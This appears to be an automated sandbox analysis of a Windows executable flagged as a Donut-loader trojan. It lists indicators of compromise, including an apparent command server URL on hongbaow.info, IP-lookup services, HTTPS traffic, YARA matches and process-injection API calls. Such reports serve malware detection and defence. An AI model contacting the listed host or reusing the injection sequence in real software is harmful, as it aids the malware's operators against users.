Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.iplocation.net/
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.189
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.iplocation.net/K
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php.com/pki/crl/products/MicCerLisCA2011_201
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php/
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php1714
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpI
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpN
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVD
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpQ
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUniv
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpd
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpdows
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpn
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpon1
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpu
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpv
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpz
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.0000000003670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/9
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/NVD
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpNVD
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/a
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/lofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/lofzqFkc7.phpP
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/baow.info/w.info
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/l
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.php
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.php5
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.phpJ
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2937168100.00000000036A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hongbaow.info/lofzqFkc7.php_
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.00000000010E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.00000000010E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/raw
Source: jhdfer3s_jh3de.exe, 00000000.00000002.2936607308.00000000010E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myexternalip.com/rawWP
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.68.240:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2936750327.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0018C650 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtQueueApcThread,NtQueueApcThread,NtTestAlert,0_2_0018C650
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A9570 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,GetStdHandle,GetLastError,0_2_001A9570
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_01258654 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtUnmapViewOfSection,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,0_2_01258654
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001AE0000_2_001AE000
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A51010_2_001A5101
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0019D9500_2_0019D950
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A99B00_2_001A99B0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B41E00_2_001B41E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_00190A900_2_00190A90
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001ACC300_2_001ACC30
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0019E4C00_2_0019E4C0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A04E00_2_001A04E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0019A5100_2_0019A510
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B3D300_2_001B3D30
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001AA5200_2_001AA520
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A76100_2_001A7610
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B0E400_2_001B0E40
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_0019F6800_2_0019F680
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001A76B00_2_001A76B0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001B1F110_2_001B1F11
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_001997700_2_00199770
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_012586540_2_01258654
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A55C100_2_02A55C10
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A6CAB00_2_02A6CAB0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A57A100_2_02A57A10
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A5A1A00_2_02A5A1A0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A511E00_2_02A511E0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A591200_2_02A59120
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A7267A0_2_02A7267A
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A5AF900_2_02A5AF90
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A514A00_2_02A514A0
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A5BC800_2_02A5BC80
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A54C200_2_02A54C20
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A735800_2_02A73580
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A585100_2_02A58510
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A53D600_2_02A53D60
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: 0_2_02A6454C0_2_02A6454C
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeCode function: String function: 02A604E0 appears 34 times
Source: jhdfer3s_jh3de.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 00000000.00000002.2936750327.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal68.evad.winEXE@2/1@3/3
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\raw[1].txtJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeMutant created: \Sessions\1\BaseNamedObjects\gqfffhj
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: jhdfer3s_jh3de.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: jhdfer3s_jh3de.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\jhdfer3s_jh3de.exe "C:\Users\user\Desktop\jhdfer3s_jh3de.exe"
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\jhdfer3s_jh3de.exeSection loaded: kernel.appcore.dllJump to behavior
